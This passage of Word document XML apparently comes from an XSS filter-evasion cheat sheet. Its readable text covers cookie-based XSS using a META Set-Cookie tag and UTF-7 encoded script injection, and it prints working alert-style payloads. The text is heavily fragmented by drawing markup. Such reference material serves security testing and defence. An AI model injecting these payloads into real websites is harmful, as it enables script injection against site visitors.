                                  <a:pt x="477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77" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="498" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="498" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="480" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="47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Text Box 634"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="6838" y="107"/>
                            <a:ext cx="49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&lt;META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3" o:spid="_x0000_s1797" style="position:absolute;left:0;text-align:left;margin-left:341.95pt;margin-top:5.35pt;width:24.95pt;height:9.15pt;z-index:-17554432;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="6839,107" coordsize="49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">
                <v:shape id="Freeform 635" o:spid="_x0000_s1798" style="position:absolute;left:6838;top:107;width:499;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="49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TTwcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvemmKpJGVyliiYgX0156e2Sf&#10;yWL2bchuNfXXu4LgcZiZb5jFqreNOFPnjWMF76MEBHHptOFKwc/31zAF4QOyxsYxKfgnD6vly2CB&#10;mXYXPtC5CJWIEPYZKqhDaDMpfVmTRT9yLXH0jq6zGKLsKqk7vES4beQ4SWbSouG4UGNL65rKU/Fn&#10;FTTH/XST/+7Sj93Ub4xp86tNc6XeXvvPOYhAfXiGH+2tVjCbTOB+Jh4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tNPBxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m477,182r-456,l18,182,,161r,-3l,21,21,,477,r21,21l498,161r-18,21l477,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="477,289;21,289;18,289;0,268;0,265;0,128;21,107;477,107;498,128;498,268;480,289;477,289" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 634" o:spid="_x0000_s1799" type="#_x0000_t202" style="position:absolute;left:6838;top:107;width:49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NQNM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COJ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I1A0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&lt;META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Admittedly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pretty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>obscure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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seen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few</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>examples</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>where</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>allowed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to</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="76" w:line="328" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="277"/>
      </w:pPr>
      <w:r>
        <w:t>overwrite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cookies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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examples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sites</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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instead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fetching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username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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database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stored</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>inside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cookie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displayed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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who</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>visits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page.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scenarios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>combined</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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modify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victim's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>back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them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JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>people</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-37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states,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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log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you,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>etc...):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:spacing w:line="328" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="140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w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0">
                <wp:extent cx="4166235" cy="116205"/>
                <wp:effectExtent l="5715" t="6985" r="0" b="635"/>
                <wp:docPr id="629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66235" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6561" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="630" name="Freeform 6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561" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 6540 w 6561"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 6561"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 6561"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 6561"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 6561"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 6561"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 6561"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 6540 w 6561"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 6561 w 6561"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 6561 w 6561"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 6543 w 6561"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 6540 w 6561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6561" h="183">
                                <a:moveTo>
                                  <a:pt x="654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540" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6561" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6561" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6543" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="654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Text Box 63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6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&lt;META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HTTP-EQUIV="Set-Cookie"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Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt;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30" o:spid="_x0000_s1800" style="width:328.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="656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">
                <v:shape id="Freeform 632" o:spid="_x0000_s1801" style="position:absolute;width:6561;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="656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4TsIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9C/6HMMLeNFWxaDWKCCseFlF30evQzDZl&#10;m0lpUu3+e3MQPD7e92rT2UrcqfGlYwXjUQKCOHe65ELBz/fncA7CB2SNlWNS8E8eNut+b4WZdg8+&#10;0/0SChFD2GeowIRQZ1L63JBFP3I1ceR+XWMxRNgUUjf4iOG2kpMkSaXFkmODwZp2hvK/S2sVhHR/&#10;uLUTM15Mz/uv22LWnq75UamPQbddggjUhbf45T5oBek0zo9n4hG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xThOwgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m6540,182l21,182r-3,l,161r,-3l,21,21,,6540,r21,21l6561,161r-18,21l6540,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6540,182;21,182;18,182;0,161;0,158;0,21;21,0;6540,0;6561,21;6561,161;6543,182;6540,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 631" o:spid="_x0000_s1802" type="#_x0000_t202" style="position:absolute;width:656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TzrMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74L/YXlCb7qxhVCjq4hYKBSKMR48PrPP&#10;ZDH7Nma3mv77rlDwOMzMN8xi1dtG3KjzxrGC6SQBQVw6bbhScCg+xu8gfEDW2DgmBb/kYbUcDhaY&#10;aXfnnG77UIkIYZ+hgjqENpPSlzVZ9BPXEkfv7DqLIcqukrrDe4TbRr4mSSotGo4LNba0qam87H+s&#10;gvWR8625fp92+Tk3RTFL+Cu9KPUy6tdzEIH68Az/tz+1gvRt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VPOs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&lt;META</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing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HTTP-EQUIV="Set-Cookie"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing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Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"&gt;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2"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>UTF-7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Encoding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line="331" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="179"/>
      </w:pP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XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>resides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doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>provide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charset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>header,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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browser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UTF-7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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exploited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(Thanks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Roman</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Ivanov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one).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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t>here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example</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(you</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>don't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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charset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>statement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4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user's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>browser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auto-detect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there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overriding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>content-types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Internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Explorer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Netscape</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>8.1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IE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>rendering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>mode).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work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modern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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changing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encoding</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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why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marked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completely</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>unsupported.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Watchfire</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>found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hole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Google's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>custom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>404</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>script.:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="7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2454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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5238750" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="626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38750" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="8250" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="627" name="Freeform 629"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="166"/>
                            <a:ext cx="8250" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 9843 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 8250"/>
                              <a:gd name="T2" fmla="+- 0 349 166"/>
                              <a:gd name="T3" fmla="*/ 349 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8250"/>
                              <a:gd name="T6" fmla="+- 0 349 166"/>
                              <a:gd name="T7" fmla="*/ 349 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8250"/>
                              <a:gd name="T10" fmla="+- 0 348 166"/>
                              <a:gd name="T11" fmla="*/ 348 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8250"/>
                              <a:gd name="T14" fmla="+- 0 328 166"/>
                              <a:gd name="T15" fmla="*/ 328 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8250"/>
                              <a:gd name="T18" fmla="+- 0 324 166"/>
                              <a:gd name="T19" fmla="*/ 324 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8250"/>
                              <a:gd name="T22" fmla="+- 0 188 166"/>
                              <a:gd name="T23" fmla="*/ 188 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8250"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 9843 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8250"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 9864 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8250"/>
                              <a:gd name="T34" fmla="+- 0 188 166"/>
                              <a:gd name="T35" fmla="*/ 188 h 183"/>
                              <a:gd name="T36" fmla="+- 0 9864 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8250"/>
                              <a:gd name="T38" fmla="+- 0 328 166"/>
                              <a:gd name="T39" fmla="*/ 328 h 183"/>
                              <a:gd name="T40" fmla="+- 0 9846 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8250"/>
                              <a:gd name="T42" fmla="+- 0 348 166"/>
                              <a:gd name="T43" fmla="*/ 348 h 183"/>
                              <a:gd name="T44" fmla="+- 0 9843 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8250"/>
                              <a:gd name="T46" fmla="+- 0 349 166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50" h="183">
                                <a:moveTo>
                                  <a:pt x="8229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8229" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8250" y="22"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8250" y="162"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8232" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82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Text Box 628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6"/>
                            <a:ext cx="825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&lt;HEAD&gt;&lt;META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HTTP-EQUIV="CONTENT-TYPE"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CONTENT="text/html;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charset=UTF-7"&gt;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&lt;/HEAD&gt;+ADw-SCRIPT+AD4-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7" o:spid="_x0000_s1803" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:412.5pt;height:9.15pt;z-index:-15591936;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="825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">
                <v:shape id="Freeform 629" o:spid="_x0000_s1804" style="position:absolute;left:1614;top:166;width:8250;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="825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QA9ccA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE7wu+w3KE3pRmU8GfxqxiC4VYETQWenvI&#10;HpNo9mzIbjW+fbdQ8HKYmW+YdNmbRlyoc7VlBS9RDIK4sLrmUsHX4eN5BsJ5ZI2NZVJwIwfLxeAh&#10;xUTbK+/pkvtSBAi7BBVU3reJlK6oyKCLbEscvKPtDPogu1LqDq8Bbho5iuOJNFhzWKiwpfeKinP+&#10;YxSsswPmT+vP/dtxO66n3ye7e91kSj0O+9UchKfe38P/7UwrmIym8HcmHA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kAPXHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m8229,183l21,183r-3,-1l,162r,-4l,22,21,,8229,r21,22l8250,162r-18,20l8229,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8229,349;21,349;18,348;0,328;0,324;0,188;21,166;8229,166;8250,188;8250,328;8232,348;8229,349" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 628" o:spid="_x0000_s1805" type="#_x0000_t202" style="position:absolute;left:1614;top:166;width:825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fM7M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SGd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3zOzBAAAA3A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&lt;HEAD&gt;&lt;META</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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HTTP-EQUIV="CONTENT-TYPE"</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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CONTENT="text/html;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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charset=UTF-7"&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="6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&lt;/HEAD&gt;+ADw-SCRIPT+AD4-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8"/>
        <w:rPr>
          <w:sz w:val="4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1651635" cy="116205"/>
                <wp:effectExtent l="5715" t="3810" r="0" b="3810"/>
                <wp:docPr id="623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1635" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2601" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="624" name="Freeform 6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601" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 2579 w 2601"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 2601"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 2601"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
                              <a:gd name="T6" fmla="*/ 0 w 2601"/>
                              <a:gd name="T7" fmla="*/ 161 h 183"/>
                              <a:gd name="T8" fmla="*/ 0 w 2601"/>
                              <a:gd name="T9" fmla="*/ 158 h 183"/>
                              <a:gd name="T10" fmla="*/ 0 w 2601"/>
                              <a:gd name="T11" fmla="*/ 21 h 183"/>
                              <a:gd name="T12" fmla="*/ 21 w 2601"/>
                              <a:gd name="T13" fmla="*/ 0 h 183"/>
                              <a:gd name="T14" fmla="*/ 2579 w 2601"/>
                              <a:gd name="T15" fmla="*/ 0 h 183"/>
                              <a:gd name="T16" fmla="*/ 2600 w 2601"/>
                              <a:gd name="T17" fmla="*/ 21 h 183"/>
                              <a:gd name="T18" fmla="*/ 2600 w 2601"/>
                              <a:gd name="T19" fmla="*/ 161 h 183"/>
                              <a:gd name="T20" fmla="*/ 2582 w 2601"/>
                              <a:gd name="T21" fmla="*/ 182 h 183"/>
                              <a:gd name="T22" fmla="*/ 2579 w 2601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601" h="183">
                                <a:moveTo>
                                  <a:pt x="257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579" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2600" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2600" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2582" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="257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Text Box 62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0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alert('XSS');+ADw-/SCRIPT+AD4-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24" o:spid="_x0000_s1806" style="width:130.05pt;height:9.15pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="260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">
                <v:shape id="Freeform 626" o:spid="_x0000_s1807" style="position:absolute;width:2601;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="260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eUOcUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQUsDMRSE74L/ITyhF7FZWyllbVpEKFXwYFtBvD03&#10;bzeLm5cleW23/94IQo/DzHzDLFaD79SRYmoDG7gfF6CIq2Bbbgx87Nd3c1BJkC12gcnAmRKsltdX&#10;CyxtOPGWjjtpVIZwKtGAE+lLrVPlyGMah544e3WIHiXL2Ggb8ZThvtOTophpjy3nBYc9PTuqfnYH&#10;nynf+uvtM07rej93m7q6FX59F2NGN8PTIyihQS7h//aLNTCbPMDfmXwE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V5Q5xQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m2579,182l21,182r-3,l,161r,-3l,21,21,,2579,r21,21l2600,161r-18,21l2579,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2579,182;21,182;18,182;0,161;0,158;0,21;21,0;2579,0;2600,21;2600,161;2582,182;2579,182" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 625" o:spid="_x0000_s1808" type="#_x0000_t202" style="position:absolute;width:260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Zjcs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nTy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tmNy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alert('XSS');+ADw-/SCRIPT+AD4-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4"/>
        <w:rPr>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="101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70464" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>6132830</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>370205</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="620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9658" y="583"/>
                          <a:chExt cx="657" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="621" name="Freeform 623"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="9657" y="582"/>
                            <a:ext cx="657" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 10293 9658"/>
                              <a:gd name="T1" fmla="*/ T0 w 657"/>
                              <a:gd name="T2" fmla="+- 0 765 583"/>
                              <a:gd name="T3" fmla="*/ 765 h 183"/>
